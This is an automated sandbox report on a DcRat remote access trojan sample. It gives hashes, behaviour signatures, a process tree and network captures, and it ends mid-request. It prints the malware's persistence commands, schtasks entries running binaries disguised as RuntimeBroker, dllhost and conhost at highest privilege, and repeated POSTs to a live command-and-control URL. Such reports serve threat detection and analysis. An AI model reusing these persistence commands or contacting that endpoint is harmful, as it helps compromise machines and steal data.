Analysis

  • max time kernel
    116s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2024 08:09

General

  • Target

    4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe

  • Size

    2.1MB

  • MD5

    0e0afa05a99d26d55a9df6876eee479f

  • SHA1

    652fe26e32763a493f04e61c5a5d36c628217ef8

  • SHA256

    4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0

  • SHA512

    bc2b23ed0307f7cd81514ff8bfe83316e1b27b6dbd69a08ca0d4618e6363dd3de5d91b1d4f38b059c73c487867c5980b7e7c49c920672589273a140728510cfc

  • SSDEEP

    24576:2TbBv5rUyXVpz/IPMofzXxgF5X1u1seTK44vmrUcSgjBYsRX8TGxj4fY3D5K7TqD:IBJp0PbsCk44v0y4BYgAGxrNKvdVTK

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe
    "C:\Users\Admin\AppData\Local\Temp\4128341009cc3f617bf5612d7c933bc99c00eea63dfce6f24bbe0ba16f1bb1f0.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:956
        • C:\ESD\Winver.exe
          "C:\ESD/Winver.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1404
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QXQBc8FYJD.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3260
            • C:\Windows\system32\chcp.com
              chcp 65001
              6⤵
                PID:2752
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                6⤵
                  PID:4564
                • C:\ESD\Winver.exe
                  "C:\ESD\Winver.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4360
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\ESD\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4300
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1408
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\ESD\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2224
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4908
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3512
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3952
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\ESD\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:460
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4796
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\ESD\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1456
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\ESD\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3760
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ESD\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2820
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\ESD\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4664
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2192
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4504
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3080
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 7 /tr "'C:\ESD\Winver.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4512
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4932
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 12 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2936

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        232.168.11.51.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.168.11.51.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        136.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        136.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        58.55.71.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        58.55.71.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        bobaprog.ru
        Winver.exe
        Remote address:
        8.8.8.8:53
        Request
        bobaprog.ru
        IN A
        Response
        bobaprog.ru
        IN A
        37.44.238.250
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 344
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:08 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 1352
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 380
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:08 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 1068
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1000
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:09 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 4
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:10 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:11 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:12 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:13 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:15 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:16 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:17 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:18 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:19 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:20 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:22 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:23 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:24 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:25 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:26 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:27 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:29 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:30 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:31 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:32 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:33 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:35 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:36 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:37 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:38 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
